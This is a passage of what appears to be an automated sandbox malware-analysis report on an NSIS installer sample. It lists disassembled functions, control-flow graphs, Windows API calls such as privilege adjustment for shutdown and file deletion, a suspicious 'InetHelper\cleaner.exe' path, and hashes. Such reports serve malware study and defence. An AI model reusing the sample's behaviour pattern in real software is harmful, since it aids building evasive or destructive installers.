125->126 126->124 136 403929-403930 CloseHandle 126->136 127->56 136->124
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(004366E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                                                                                                              • CharNextW.USER32(00000000,004C1000,00000020,004C1000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00002000,004D5000,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004D5000,00001FFB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,\Temp), ref: 00403705
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00001FFC,004D5000,004D5000,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,Low), ref: 00403721
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,004D5000,004D5000,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,004D5000,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(004D1000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,~nsu), ref: 0040384D
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,0040A328), ref: 0040385C
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,.tmp), ref: 00403867
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(004D5000,004CD000,004D5000,.tmp,004D5000,~nsu,004C1000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004D5000,004D5000,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(004326E8,004326E8,?,00471000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                                                                                                              • CopyFileW.KERNEL32(004DD000,004326E8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,004326E8,004326E8,?,004326E8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                              • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu$&C
                                                                                                                                                                                                              • API String ID: 424501083-3710082758
                                                                                                                                                                                                              • Opcode ID: e783125dba734ed597e1940b01dc1cab2e95ffc2bcbea3dcea6e2450cdaed4c7
                                                                                                                                                                                                              • Instruction ID: a55e1ba19ca46540f0e819ab7f1242b390505e394ddfc82397b04f5546c7078a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e783125dba734ed597e1940b01dc1cab2e95ffc2bcbea3dcea6e2450cdaed4c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D1D671600310AAD7206F769D49B3B3AACEB4074AF10443FF985B62D2DBBD8D45876E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405AFA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 344 405afa-405b20 call 405dc5 347 405b22-405b34 DeleteFileW 344->347 348 405b39-405b40 344->348 349 405cb6-405cba 347->349 350 405b42-405b44 348->350 351 405b53-405b63 call 4063e8 348->351 353 405c64-405c69 350->353 354 405b4a-405b4d 350->354 357 405b72-405b73 call 405d09 351->357 358 405b65-405b70 lstrcatW 351->358 353->349 356 405c6b-405c6e 353->356 354->351 354->353 359 405c70-405c76 356->359 360 405c78-405c80 call 40672b 356->360 361 405b78-405b7c 357->361 358->361 359->349 360->349 368 405c82-405c96 call 405cbd call 405ab2 360->368 364 405b88-405b8e lstrcatW 361->364 365 405b7e-405b86 361->365 367 405b93-405baf lstrlenW FindFirstFileW 364->367 365->364 365->367 369 405bb5-405bbd 367->369 370 405c59-405c5d 367->370 384 405c98-405c9b 368->384 385 405cae-405cb1 call 405450 368->385 373 405bdd-405bf1 call 4063e8 369->373 374 405bbf-405bc7 369->374 370->353 372 405c5f 370->372 372->353 386 405bf3-405bfb 373->386 387 405c08-405c13 call 405ab2 373->387 376 405bc9-405bd1 374->376 377 405c3c-405c4c FindNextFileW 374->377 376->373 382 405bd3-405bdb 376->382 377->369 381 405c52-405c53 FindClose 377->381 381->370 382->373 382->377 384->359 388 405c9d-405cac call 405450 call 4061ae 384->388 385->349 386->377 389 405bfd-405c06 call 405afa 386->389 397 405c34-405c37 call 405450 387->397 398 405c15-405c18 387->398 388->349 389->377 397->377 401 405c1a-405c2a call 405450 call 4061ae 398->401 402 405c2c-405c32 398->402 401->377 402->377
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,004D5000,74DF2EE0,00000000), ref: 00405B23
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00456730,\*.*), ref: 00405B6B
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405B8E
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00456730,?,?,004D5000,74DF2EE0,00000000), ref: 00405B94
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00456730,?,?,?,0040A014,?,00456730,?,?,004D5000,74DF2EE0,00000000), ref: 00405BA4
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                              • String ID: 0gE$\*.*
                                                                                                                                                                                                              • API String ID: 2035342205-2711052210
                                                                                                                                                                                                              • Opcode ID: 3334b6062cde555aafe81a7f2d70c90e4ee62922905af9c316e4bc959eba850f
                                                                                                                                                                                                              • Instruction ID: db7c1e1462c3060b38713ca1582bdc14a6091e72a68d91c70f93002fb38cedfa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3334b6062cde555aafe81a7f2d70c90e4ee62922905af9c316e4bc959eba850f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7941F230805B18A6EB20AB618C89BAF7778DF41718F10813BF805711D2D77C59C28EAE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 609 406af2-406af7 610 406b68-406b86 609->610 611 406af9-406b28 609->611 614 40715e-407173 610->614 612 406b2a-406b2d 611->612 613 406b2f-406b33 611->613 615 406b3f-406b42 612->615 616 406b35-406b39 613->616 617 406b3b 613->617 618 407175-40718b 614->618 619 40718d-4071a3 614->619 621 406b60-406b63 615->621 622 406b44-406b4d 615->622 616->615 617->615 620 4071a6-4071ad 618->620 619->620 623 4071d4-4071e0 620->623 624 4071af-4071b3 620->624 627 406d35-406d53 621->627 625 406b52-406b5e 622->625 626 406b4f 622->626 636 406976-40697f 623->636 628 407362-40736c 624->628 629 4071b9-4071d1 624->629 633 406bc8-406bf6 625->633 626->625 631 406d55-406d69 627->631 632 406d6b-406d7d 627->632 638 407378-40738b 628->638 629->623 637 406d80-406d8a 631->637 632->637 634 406c12-406c2c 633->634 635 406bf8-406c10 633->635 639 406c2f-406c39 634->639 635->639 640 406985 636->640 641 40738d 636->641 642 406d8c 637->642 643 406d2d-406d33 637->643 644 407390-407394 638->644 646 406bb0-406bb6 639->646 647 406c3f 639->647 648 406a31-406a35 640->648 649 406aa1-406aa5 640->649 650 40698c-406990 640->650 651 406acc-406aed 640->651 641->644 652 406d08-406d0c 642->652 653 406e9d-406eaa 642->653 643->627 645 406cd1-406cdb 643->645 654 407320-40732a 645->654 655 406ce1-406d03 645->655 656 406c69-406c6f 646->656 657 406bbc-406bc2 646->657 671 406b95-406bad 647->671 672 4072fc-407306 647->672 658 4072e1-4072eb 648->658 659 406a3b-406a54 648->659 664 4072f0-4072fa 649->664 665 406aab-406abf 649->665 650->638 663 406996-4069a3 650->663 651->614 660 406d12-406d2a 652->660 661 407314-40731e 652->661 653->636 654->638 655->653 666 406ccd 656->666 668 406c71-406c8f 656->668 657->633 657->666 658->638 667 406a57-406a5b 659->667 660->643 661->638 663->641 669 4069a9-4069ef 663->669 664->638 670 406ac2-406aca 665->670 666->645 667->648 673 406a5d-406a63 667->673 674 406c91-406ca5 668->674 675 406ca7-406cb9 668->675 676 4069f1-4069f5 669->676 677 406a17-406a19 669->677 670->649 670->651 671->646 672->638 678 406a65-406a6c 673->678 679 406a8d-406a9f 673->679 680 406cbc-406cc6 674->680 675->680 681 406a00-406a0e GlobalAlloc 676->681 682 4069f7-4069fa GlobalFree 676->682 683 406a27-406a2f 677->683 684 406a1b-406a25 677->684 685 406a77-406a87 GlobalAlloc 678->685 686 406a6e-406a71 GlobalFree 678->686 679->670 680->656 687 406cc8 680->687 681->641 688 406a14 681->688 682->681 683->667 684->683 684->684 685->641 685->679 686->685 690 407308-407312 687->690 691 406c4e-406c66 687->691 688->677 690->638 691->656
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(004D5000,0045E778,0045A730,00405E0E,0045A730,0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0), ref: 00406736
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                              • String ID: xE
                                                                                                                                                                                                              • API String ID: 2295610775-407097786
                                                                                                                                                                                                              • Opcode ID: c38ed24b0f8540a8630b6e30e0d29a5f0a32ff0f94a31cb594348fc3b8955e5f
                                                                                                                                                                                                              • Instruction ID: fc51c24eb8738f718e6fd544cb5c99b56e4f1c2878dc56694a5fb172fd41157c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c38ed24b0f8540a8630b6e30e0d29a5f0a32ff0f94a31cb594348fc3b8955e5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83D012315150205BD2011738AD4C85B7A589F153367218B37B866F61E0C7348C62869C
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00403AD8 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 137 403ad8-403af0 call 4067c2 140 403af2-403afd GetUserDefaultUILanguage call 40632f 137->140 141 403b04-403b3b call 4062b6 137->141 144 403b02 140->144 147 403b53-403b59 lstrcatW 141->147 148 403b3d-403b4e call 4062b6 141->148 146 403b5e-403b87 call 403dae call 405dc5 144->146 154 403c19-403c21 call 405dc5 146->154 155 403b8d-403b92 146->155 147->146 148->147 161 403c23-403c2a call 40640a 154->161 162 403c2f-403c54 LoadImageW 154->162 155->154 156 403b98-403bc0 call 4062b6 155->156 156->154 163 403bc2-403bc6 156->163 161->162 165 403cd5-403cdd call 40140b 162->165 166 403c56-403c86 RegisterClassW 162->166 167 403bd8-403be4 lstrlenW 163->167 168 403bc8-403bd5 call 405cea 163->168 179 403ce7-403cf2 call 403dae 165->179 180 403cdf-403ce2 165->180 169 403da4 166->169 170 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 166->170 174 403be6-403bf4 lstrcmpiW 167->174 175 403c0c-403c14 call 405cbd call 4063e8 167->175 168->167 173 403da6-403dad 169->173 170->165 174->175 178 403bf6-403c00 GetFileAttributesW 174->178 175->154 182 403c02-403c04 178->182 183 403c06-403c07 call 405d09 178->183 189 403cf8-403d12 ShowWindow call 406752 179->189 190 403d7b-403d83 call 405523 179->190 180->173 182->175 182->183 183->175 195 403d14-403d19 call 406752 189->195 196 403d1e-403d30 GetClassInfoW 189->196 197 403d85-403d8b 190->197 198 403d9d-403d9f call 40140b 190->198 195->196 202 403d32-403d42 GetClassInfoW RegisterClassW 196->202 203 403d48-403d79 DialogBoxParamW call 40140b call 403a28 196->203 197->180 199 403d91-403d98 call 40140b 197->199 198->169 199->180 202->203 203->173
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,004D5000,74DF3420,004C1000,00000000), ref: 00403AF2
                                                                                                                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D1000,00446728), ref: 00403B59
                                                                                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,004C5000,004D1000,00446728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446728,00000000,00000002,004D5000), ref: 00403BD9
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,004C5000,004D1000,00446728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446728,00000000), ref: 00403BEC
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"), ref: 00403BF7
                                                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C5000), ref: 00403C40
                                                                                                                                                                                                              • RegisterClassW.USER32(004681E0), ref: 00403C7D
                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004681E0), ref: 00403D2C
                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004681E0), ref: 00403D39
                                                                                                                                                                                                              • RegisterClassW.USER32(004681E0), ref: 00403D42
                                                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$(gD$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                              • API String ID: 606308-2529400235
                                                                                                                                                                                                              • Opcode ID: 0a001c7189d7d63785f1ec2c4194aaaeaf8e16c765d4c7e048e7af561835fdd7
                                                                                                                                                                                                              • Instruction ID: 53e884cc7334fa84a1d96ccc45fe83da0addadf9397a6dbc28c3941536bb6224
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a001c7189d7d63785f1ec2c4194aaaeaf8e16c765d4c7e048e7af561835fdd7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E361D631200700BAD320AF669E49F2B3B6CEB8574AF00417FF945B22E2DB7D9D41866D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00402F30 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 203memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 210 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 213 402f80-402f85 210->213 214 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 210->214 215 4031cf-4031d3 213->215 222 4030a8-4030b6 call 402e8e 214->222 223 402fbe-402fd5 214->223 230 403187-40318c 222->230 231 4030bc-4030bf 222->231 224 402fd7 223->224 225 402fd9-402fe6 call 403447 223->225 224->225 232 403143-40314b call 402e8e 225->232 233 402fec-402ff2 225->233 230->215 234 4030c1-4030d9 call 40345d call 403447 231->234 235 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 231->235 232->230 237 403072-403076 233->237 238 402ff4-40300c call 405e99 233->238 234->230 258 4030df-4030e5 234->258 261 403139-40313e 235->261 262 40314d-40317d call 40345d call 4031d6 235->262 242 403078-40307e call 402e8e 237->242 243 40307f-403085 237->243 238->243 256 40300e-403015 238->256 242->243 249 403087-403095 call 4068b5 243->249 250 403098-4030a2 243->250 249->250 250->222 250->223 256->243 260 403017-40301e 256->260 258->230 258->235 260->243 263 403020-403027 260->263 261->215 269 403182-403185 262->269 263->243 266 403029-403030 263->266 266->243 268 403032-403052 266->268 268->230 270 403058-40305c 268->270 269->230 271 40318e-40319f 269->271 272 403064-40306c 270->272 273 40305e-403062 270->273 275 4031a1 271->275 276 4031a7-4031ac 271->276 272->243 274 40306e-403070 272->274 273->222 273->272 274->243 275->276 277 4031ad-4031b3 276->277 277->277 278 4031b5-4031cd call 405e99 277->278 278->215
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004DD000,00002000), ref: 00402F60
                                                                                                                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004E1000,00000000,004CD000,004CD000,004DD000,004DD000,80000000,00000003), ref: 00402FA9
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                                                                                                              • *:o, xrefs: 004031B5
                                                                                                                                                                                                              • Null, xrefs: 00403029
                                                                                                                                                                                                              • Inst, xrefs: 00403017
                                                                                                                                                                                                              • soft, xrefs: 00403020
                                                                                                                                                                                                              • Error launching installer, xrefs: 00402F80
                                                                                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                                                                                                              • HA, xrefs: 004030F6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
